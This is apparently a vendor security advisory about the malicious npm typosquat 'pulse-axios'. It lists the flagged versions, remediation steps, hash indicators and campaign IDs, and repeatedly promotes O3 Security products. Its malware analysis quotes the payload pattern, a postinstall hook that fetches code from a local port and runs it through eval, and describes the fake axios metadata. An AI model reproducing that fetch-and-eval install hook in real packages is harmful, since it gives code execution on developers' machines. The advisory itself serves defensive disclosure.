Which versions of pulse-axios are malicious?

The following npm versions of pulse-axios are flagged malicious: 1.16.1, 1.17.1, 1.17.2. Treat any of these as compromised.

How do I remediate pulse-axios if I installed it?

pulse-axios is a typosquat — you almost certainly intended a legitimately-named package. Remove pulse-axios, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.

I already installed pulse-axios — how do I know if it already compromised me?

If pulse-axios was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is pulse-axios part of a known attack campaign?

Yes — pulse-axios is associated with the IN-MAL-2026-003766, IN-MAL-2026-003389, IN-MAL-2026-003767, IN-MAL-2026-003385, IN-MAL-2026-003390 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find pulse-axios across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for pulse-axios (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging pulse-axios across your stack and pipelines.

Malicious package

pulse-axiosnpm

Malicious code in pulse-axios (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4651

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall pulse-axios

What this malware does

[email protected] declares a postinstall hook (node./lib/core/eval.js) that on npm install issues fetch('http://localhost:3000/download/data'), reads the response body as text, and passes it to eval inside an async IIFE: await eval(\(async () => {\n${datab2}\n})();`). Errors are silently swallowed in an empty catch. Any bytes returned by whatever process is listening on port 3000 at install time — including any local attacker process, a co-installed malicious package's helper, or a developer-staging payload server — execute with the installer's privileges. The package additionally impersonates the legitimate axiospackage:name: pulse-axios, description claims to be "a faster and better version of axios", authoris set toMatt Zabriskie(the real axios maintainer),repository.urlpoints tohttps://github.com/axios/axios.git`, and homepage is https://axios-http.com. The metadata theft is designed to fool installers into believing this is a legitimate axios variant. Combined, the package is a typosquat lure that ships an install-time RCE primitive.

Malicious versions

3 flagged

1.16.11.17.11.17.2

Indicators of compromise (SHA-256)

28257d4309df99e3d275ee13a8070e9be516444fc5a5e954c864cbf7d7b1f89c

5697e55222985697b89b9d1755984516563ff0a30218ac331c34aee46f3f1d07

a04cbfa8262f2b1fc518a4124a825108b1895b24e6222a1306c57c136aa180a7

c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99

d53e7eba89c2c1763024ac4b829f4f12f5e5f901a407c4fc7b157417aec557f1

Detection & response playbook

Typosquat

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for pulse-axios (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging pulse-axios across your stack and pipelines.
If you installed it — respond
pulse-axios is a typosquat — you almost certainly intended a legitimately-named package. Remove pulse-axios, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.
Did it already run?
If pulse-axios was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks pulse-axios before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. pulse-axios on npm has been identified as a malicious package (versions 1.16.1, 1.17.1, 1.17.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-003766IN-MAL-2026-003389IN-MAL-2026-003767IN-MAL-2026-003385IN-MAL-2026-003390

References

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks pulse-axios-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Malware detection Runtime egress monitoring